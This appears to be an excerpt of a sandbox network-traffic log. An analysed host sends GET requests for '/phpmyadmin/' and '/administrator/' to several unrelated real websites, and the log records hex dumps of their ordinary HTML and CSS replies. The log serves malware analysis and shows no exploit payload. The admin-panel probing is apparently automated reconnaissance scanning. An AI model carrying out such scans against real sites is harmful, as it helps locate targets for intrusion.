2024-02-20 23:26:10 UTC	16384	IN	Data Raw: 20 30 20 32 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 23 6c 6f 67 6f 2c 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 2e 63 75 73 74 6f 6d 2d 6c 6f 67 6f 2d 6c 69 6e 6b 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 6f 67 6f 2d 6e 6f 2d 73 74 69 63 6b 79 2d 70 61 64 64 69 6e 67 20 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 36 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 36 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 54 6f 70 Data Ascii: 0 20px;padding:0}#Top_bar.is-sticky #logo,#Top_bar.is-sticky .custom-logo-link{padding:5px 0!important;height:50px!important;line-height:50px!important}.logo-no-sticky-padding #Top_bar.is-sticky #logo{height:60px!important;line-height:60px!important}#Top
2024-02-20 23:26:10 UTC	16384	IN	Data Raw: 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 70 61 67 65 2d 70 61 72 65 6e 74 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 0d 0a 66 66 64 31 0d 0a 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 61 6e 63 65 73 74 6f 72 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 Data Ascii: > a,.menu-highlight #Top_bar #menu > ul > li.current-menu-parent > a,.menu-highlight #Top_bar #menu > ul > li.current-page-parent > a,.menu-highlight #Top_bar #menu >ffd1 ul > li.current-menu-ancestor > a,.menu-highlight #Top_bar #menu > ul > li.curre
2024-02-20 23:26:10 UTC	16384	IN	Data Raw: 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 76 63 5f 63 75 73 74 6f 6d 5f 31 36 34 37 33 33 36 34 34 33 34 34 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 76 63 5f 63 75 73 74 6f 6d 5f 31 36 34 37 33 33 36 34 34 33 34 34 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e Data Ascii: round-position: 0 0 !important;background-repeat: no-repeat !important;}.vc_custom_1647336443442{background-position: 0 0 !important;background-repeat: no-repeat !important;}.vc_custom_1647336443442{background-position: 0 0 !important;background-repeat: n
2024-02-20 23:26:10 UTC	16384	IN	Data Raw: 2d 6c 61 7a 79 6c 6f 61 64 22 20 77 69 64 74 68 3d 22 33 30 30 22 20 68 65 69 67 68 74 3d 22 32 36 31 22 20 64 61 74 61 2d 6c 61 7a 79 6c 6f 61 64 3d 22 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 72 65 73 65 61 75 2d 6e 61 74 69 6f 6e 61 6c 2e 70 6e 67 22 20 64 61 74 61 2d 6e 6f 2d 72 65 74 69 6e 61 3e 20 0a 09 09 09 09 09 09 09 3c 2f 72 73 2d 6c 61 79 65 72 3e 3c 21 2d 2d 0a 0a 09 09 09 09 09 09 09 2d 2d 3e 3c 72 73 2d 6c 61 79 65 72 0a 09 09 09 09 09 09 09 09 69 64 3d 22 73 6c 69 64 65 72 2d 32 2d 73 6c 69 64 65 2d 32 2d 6c 61 79 65 72 2d 31 34 22 20 0a 09 09 09 09 09 09 09 09 64 61 74 61 2d 74 79 70 65 3d 22 69 6d 61 67 65 22 0a 09 09 09 09 09 09 09 09 64 61 74 61 2d 72 73 70 Data Ascii: -lazyload" width="300" height="261" data-lazyload="//www.glazing-bt.com/wp-content/uploads/reseau-national.png" data-no-retina> </rs-layer>...--><rs-layerid="slider-2-slide-2-layer-14" data-type="image"data-rsp
2024-02-20 23:26:10 UTC	16384	IN	Data Raw: 5f 66 69 67 75 72 65 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 63 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 2d 77 72 61 70 70 65 72 20 20 20 76 63 5f 62 6f 78 5f 62 6f 72 64 65 72 5f 67 72 65 79 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 33 30 31 22 20 68 65 69 67 68 74 3d 22 35 35 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 69 63 6f 6e 73 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 76 63 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 2d 69 6d 67 20 61 74 74 61 63 68 6d 65 6e 74 2d 66 75 6c 6c 22 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 Data Ascii: _figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="301" height="55" src="https://www.glazing-bt.com/wp-content/uploads/glazing-icons.png" class="vc_single_image-img attachment-full" alt="" loading="lazy" srcset="https://www
2024-02-20 23:26:10 UTC	16384	IN	Data Raw: c3 a9 72 65 72 20 64 65 73 20 70 72 6f 66 65 73 73 69 6f 6e 6e 65 6c 73 20 64 75 20 6d c3 a9 74 69 65 72 20 64 75 20 76 69 74 72 61 67 65 20 61 75 74 6f 75 72 20 64 e2 80 99 75 6e 65 20 65 6e 73 65 69 67 6e 65 20 6e 61 74 69 6f 6e 61 6c 65 2e 3c 2f 73 70 61 6e 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0d 0a 66 66 66 38 0d 0a 0a 09 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 77 70 62 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 20 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 76 63 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 20 77 70 62 5f 61 6e 69 6d 61 74 65 5f 77 68 65 6e 5f 61 6c 6d 6f 73 74 5f 76 69 73 69 62 6c 65 20 77 70 62 5f 66 61 64 65 49 6e 20 66 61 64 65 49 6e 20 76 63 5f Data Ascii: rer des professionnels du mtier du vitrage autour dune enseigne nationale.</span></strong></span></p></div></div>fff8<div class="wpb_single_image wpb_content_element vc_align_left wpb_animate_when_almost_visible wpb_fadeIn fadeIn vc_
2024-02-20 23:26:10 UTC	16384	IN	Data Raw: 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2e 6a 70 67 20 35 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2d 32 37 30 78 33 30 30 2e 6a 70 67 20 32 37 30 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2d 31 33 32 78 31 34 36 2e 6a 70 67 20 31 33 32 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e Data Ascii: -content/uploads/glazing-valeurs.jpg 500w, https://www.glazing-bt.com/wp-content/uploads/glazing-valeurs-270x300.jpg 270w, https://www.glazing-bt.com/wp-content/uploads/glazing-valeurs-132x146.jpg 132w, https://www.glazing-bt.com/wp-content/uploads/glazin

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.6	55932	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:08 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	355	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1k9i469srqfgmr47e40c9d4e5j; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: /
2024-02-20 23:26:09 UTC	11	IN	Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.6	56129	185.39.146.199	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	735	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:09 GMT expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: PHPSESSID=nbo5dkpghnmk09b9mde7vjlk4k; expires=Fri, 10-Jun-2078 22:52:18 GMT; Max-Age=1713655569; path=/; secure; HttpOnly; SameSite=None access-control-allow-origin: * access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUT access-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, token content-type: text/html; charset=iso-8859-1 x-backend: server2 x-type: customer x-varnish: 961018282 age: 0 transfer-encoding: chunked x-server: varnish-1 connection: close
2024-02-20 23:26:09 UTC	12536	IN	Data Raw: 33 30 46 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6f 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 20 4d 61 72 6b f8 72 65 6e 20 52 65 6b 6c 61 6d 65 20 41 53 20 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 30F0<!DOCTYPE html><html lang="no"><head><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title> Markren Reklame AS </title><meta name
2024-02-20 23:26:09 UTC	5790	IN	Data Raw: 31 36 39 36 0d 0a 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 6b 6f 6e 74 61 6b 74 22 20 3e 4b 6f 6e 74 61 6b 74 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 0a 0a 0a 0a 09 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 76 69 73 69 62 6c 65 2d 78 73 22 3e 0a 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 6d 6f 64 61 6c 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 6c 6f 67 69 6e 4d 6f 64 61 6c 22 20 68 72 65 66 3d 22 23 22 3e 4c 6f 67 67 20 70 e5 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 0a 09 09 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 2d 78 Data Ascii: 1696><a href="/kontakt" >Kontakt</a></li><li class="visible-xs"><a data-toggle="modal" data-target="#loginModal" href="#">Logg p</a></li></ul></div><div class="hidden-x
2024-02-20 23:26:09 UTC	14476	IN	Data Raw: 33 38 38 34 0d 0a 70 61 6e 3e 20 53 f8 6b 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 64 69 76 3e 0a 0a 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 66 6f 72 6d 3e 0a 0a 09 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 70 3e 3c 2f 70 3e 0a 0a 0a 09 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 68 65 61 64 65 72 22 3e 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 Data Ascii: 3884pan> Sk</button></div></div> </div> </div></span></div></form></div></div></div><p></p><nav class="navbar navbar-default" role="navigation"><div class="container"><div class="navbar-header"><button type="bu
2024-02-20 23:26:09 UTC	8691	IN	Data Raw: 32 31 45 42 0d 0a 65 76 61 72 65 72 2f 70 61 72 6b 65 72 22 3e 50 61 72 6b 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 70 72 65 6d 69 65 72 22 3e 50 72 65 6d 69 65 72 26 23 30 31 37 34 3b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 71 75 61 64 72 61 22 3e 51 75 61 64 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 72 65 67 61 74 74 61 22 3e 52 65 67 61 74 74 61 26 23 30 31 37 34 3b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 Data Ascii: 21EBevarer/parker">Parker</a></li><li><a href="/sortiment/merkevarer/premier">Premier®</a></li><li><a href="/sortiment/merkevarer/quadra">Quadra</a></li><li><a href="/sortiment/merkevarer/regatta">Regatta®</a></li><li><a href="/sorti
2024-02-20 23:26:09 UTC	1455	IN	Data Raw: 35 41 38 0d 0a 75 6c 74 20 70 75 6c 6c 2d 6c 65 66 74 22 20 6f 6e 63 6c 69 63 6b 3d 22 75 73 65 72 6c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 4e 65 77 48 69 64 65 28 29 3b 22 20 3e 54 69 6c 62 61 6b 65 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 64 6f 6e 65 77 70 61 73 73 77 6f 72 64 20 68 69 64 64 65 6e 20 62 74 6e 20 62 74 6e 2d 73 75 63 63 65 73 73 22 20 6f 6e 63 6c 69 63 6b 3d 22 75 73 65 72 6c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 4e 65 77 53 65 6e 64 28 27 6c 6f 67 69 6e 6d 6f 64 61 6c 5f 66 6f 72 6d 27 29 3b 22 20 3e 42 65 20 6f 6d 20 6e 79 74 74 20 70 61 73 73 6f 72 64 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 Data Ascii: 5A8ult pull-left" onclick="userlogin.passwordNewHide();" >Tilbake</button><button type="button" class="donewpassword hidden btn btn-success" onclick="userlogin.passwordNewSend('loginmodal_form');" >Be om nytt passord</button></div></div></div
2024-02-20 23:26:09 UTC	1455	IN	Data Raw: 35 41 38 0d 0a 64 61 6c 4c 61 62 65 6c 22 3e 48 61 6e 64 6c 65 6b 75 72 76 3c 2f 68 34 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 62 6f 64 79 22 3e 0a 3c 74 65 6d 70 6c 61 74 65 20 69 64 3d 22 74 65 6d 70 6c 61 74 65 5f 63 61 72 74 6c 69 73 74 5f 69 74 65 6d 73 22 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 34 20 63 6f 6c 2d 73 6d 2d 32 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 75 6e 70 72 2e 69 6f 2f 5f 67 66 78 2f 63 6c 65 61 72 64 6f 74 2e 67 69 66 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 63 6f 6c 2d 73 6d 2d 35 22 3e 3c 61 20 68 72 65 66 3d 22 7b 63 61 Data Ascii: 5A8dalLabel">Handlekurv</h4></div><div class="modal-body"><template id="template_cartlist_items"><div class="row"><div class="col-xs-4 col-sm-2"><img src="https://static.unpr.io/_gfx/cleardot.gif"></div><div class="col-xs-6 col-sm-5"><a href="{ca
2024-02-20 23:26:09 UTC	2062	IN	Data Raw: 35 41 38 0d 0a 6c 61 73 73 3d 22 77 65 6c 6c 22 3e 0a 0a 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 4f 6f 70 73 21 20 3c 73 6d 61 6c 6c 3e 34 30 34 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 09 09 09 09 56 69 20 66 61 6e 74 20 64 65 73 73 76 65 72 72 65 20 69 6b 6b 65 20 73 69 64 65 6e 20 64 75 20 6c 65 74 74 65 20 65 74 74 65 72 2e 0a 09 09 09 09 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 61 72 67 65 74 3d 22 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 6d 64 22 3e 47 e5 20 74 69 6c 20 73 Data Ascii: 5A8lass="well"><h1 style="font-size:60px" class="text-center">Oops! <small>404</small></h1><div class="text-center">Vi fant dessverre ikke siden du lette etter.<br><br><a href="/" target="" class="btn btn-primary btn-md">G til s

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.6	56705	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	187	OUT	GET /administrator/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	791	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://fortressrealcapital.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aWhL9%2FIRI2EW6%2FG6Qiwayn9mrkgz9BLTTFVvXG92g1zORv5dZvlr4%2F0IENTKfT%2BzxB2KRwkVChd4fZ2TkzWB0T5Ib0VFFLMAuOCF5n1IbJO5EEjieAUlIaVFo5133a9p99q8s%2FdOdIrOSw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a834e0cfdc34b-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:10 UTC	578	IN	Data Raw: 37 63 39 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c Data Ascii: 7c9b<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f Data Ascii: _name" content="Fortress Real Capital" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://fortressrealcapital.com/#website","url":"https://fortressrealcapital.com/
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Fortress Real Capital » Feed" href="https://fortressrealcapital.com/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/c
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 62 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 Data Ascii: 